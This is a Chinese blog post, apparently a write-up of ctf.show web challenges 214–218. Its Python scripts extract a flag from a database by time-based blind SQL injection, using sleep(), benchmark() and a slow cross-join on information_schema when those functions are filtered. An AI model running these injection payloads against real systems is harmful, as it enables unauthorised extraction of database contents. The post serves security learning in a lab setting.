当前位置: 首页 > news >正文

ctfhow——web入门214~218(时间盲注开始)

news 来源:原创 2025/4/25 10:07:54
web入门214

#@another:uwvwko
import requestsurl='http://b0c11589-31c9-4bf9-8b66-6b5a1fc08726.challenge.ctf.show/api/index.php'
flag=''
str='{-_1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM}'for i in range(1,50):for j in str:# 查数据库# payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"# 查列名字-id.flag# payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"# 查数据payload = "select flaga from ctfshow_flagx"data ={'ip':f"if(substr(({payload}),{i},1)='{j}',sleep(3),0)",'debug':'1'}r=requests.post(url,data=data)if r.elapsed.total_seconds() > 2:flag+=jprint(flag)break

web入门215
#@uwvwko
import requests
import timeurl='http://17ae312d-8d89-42f7-b881-b9068c90093b.challenge.ctf.show/api/'flag=''str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'for i in range(1,60):for j in str:payload={#'ip':f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'{i}',1)={q},sleep(3),'False')#",#'ip':f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),'{i}',1)={q},sleep(3),'False')#",'ip': f"1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{i},1)='{j}',sleep(3),'False')#",'debug': 0}r=requests.post(url,data=payload)if r.elapsed.total_seconds()>2:flag+=jprint(flag)break

(为啥有个A类)

web入门216

base64编码,但是我们可以直接用)来闭合

如:where id =from_base64(0)payload

脚本:

import requestsurl='http://c5791659-334c-48d2-833a-1f0c9fa90735.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''for j in range(1, 50):for k in str:# payload = {'debug':'0','ip':f"1)or if(substr(database(),{j},1)='{k}',sleep(3),0)#"}  # 猜数据库名# payload = {'debug': '0', 'ip': f"1)or if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名# payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜表名# payload = {'debug': '0','ip': f"1)or if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxcc'), {j}, 1) = '{k}',sleep(3),0)#"}  # 猜列名payload = {'debug': '0', 'ip': f"1)or if(substr((select flagaac from ctfshow_flagxcc), {j}, 1) = '{k}',sleep(3),0)#"}  re = requests.post(url, data=payload)if re.elapsed.total_seconds() > 2:flag += kprint(flag)break

web入门217

毙了sleep

看了下大佬的payload,我们可以使用 benchmark,

benchmark(count,expr),重复执行 count 次 expr 表达式,使得处理时间很长

时间大概是3秒,然后开始写脚本

import requestsurl='http://4baeb3f2-07a1-438f-a1a6-6e984cf82339.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''for i in range(1, 60):for j in str:payload = {'debug': '1', # 'ip':f"if(substr(database(),{j},1)='{k}',benchmark(3000000,md5('myon')),0)"}  # 猜数据库名# 'ip': f"if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',benchmark(3000000,md5('12354')),0)"} # 'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',benchmark(3000000,md5('12345')),0)"}  # 'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flagxccb'), {j}, 1) = '{k}',benchmark(3000000,md5('123415')),0)"} 'ip': f"if(substr((select flagaabc from ctfshow_flagxccb), {i}, 1) = '{j}',benchmark(3000000,md5('12345')),0)"}r = requests.post(url, data=payload)if r.elapsed.total_seconds() > 2:flag += jprint(flag)break

web入门218

benchmark被禁了

脚本:

import requestsurl = 'http://04ce659f-5b93-475f-8526-203b887d0719.challenge.ctf.show/api/'
str='abcdefghijklmnopqrstuvwxyz0123456789{-}_QWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''for i in range(0, 60):for j in str:payload = {'debug': '1', #'ip': f"if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database(),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"#'ip': f"if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"'ip': f"if(substr((select group_concat(flagaac) from ctfshow_flagxc),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),'False')"}r = requests.post(url, data=payload)if r.elapsed.total_seconds() > 0.4:flag += jprint(flag)break

(SELECT count(*) FROM information_schema.columns A, information_schema.columns B) 是一个时间延迟或资源消耗的操作,至于判断的时间要根据自己的电脑进行调试,显示出来的flag有可能会有误差

相关文章:

  • 【FAQ】安装Agent的主机,为何不能更改显示分辨率
  • SQL Server 2008 R2中varchar(max)的含义
  • Hive 数据同步到 Doris 最佳实践方案:从场景适配到性能调优全解析
  • Python3 基础:控制流结构(条件语句、循环)
  • 【C++基础知识】C++类型特征组合:`disjunction_v` 和 `conjunction_v` 深度解析
  • Visual Studio C/C++编译器cl.exe的/source-charset与/execution-charset设置项
  • 扩展中国剩余定理
  • day 32 学习笔记
  • 【前端】【业务场景】【面试】在前端开发中,如何优化 SVG(可缩放矢量图形)的性能,特别是在处理复杂图形和动画时
  • ZooKeeper配置优化秘籍:核心参数说明与性能优化
  • 多维时序 | LightGBM多变量时序预测(Matlab完整源码和数据,适合基础小白研究)
  • 最高支持高速L3商用,华为发布ADS 4智驾系统
  • AT45DB161串行FLASH操作
  • 晶振不集成到芯片内部的原因分析
  • Ubuntu中选择Python虚拟环境
  • 考拉悠然:科技与匠心,以烟草虫情AI监测系统共筑品质未来
  • git tag使用场景和实践
  • BDO分厂开展地沟“大清肠”工作
  • 交通运输行业综合智慧监管平台:商贸物流的安全与效率引擎
  • G3学习笔记
  • 国新办发布会丨2024年市监部门查办知产领域侵权行政违法案件4.4万件
  • 嫦娥五号月球样品将借给这些国家机构
  • 韩国检方起诉前总统文在寅
  • 宁德时代校友红利!副董事长给母校复旦豪捐10亿,曾毓群给交大捐近14亿
  • 稀土管制难倒特斯拉人形机器人“擎天柱”,马斯克:“正与中国协商”
  • 何以中国|福建武夷山:千年茶道的文旅“破圈”与新生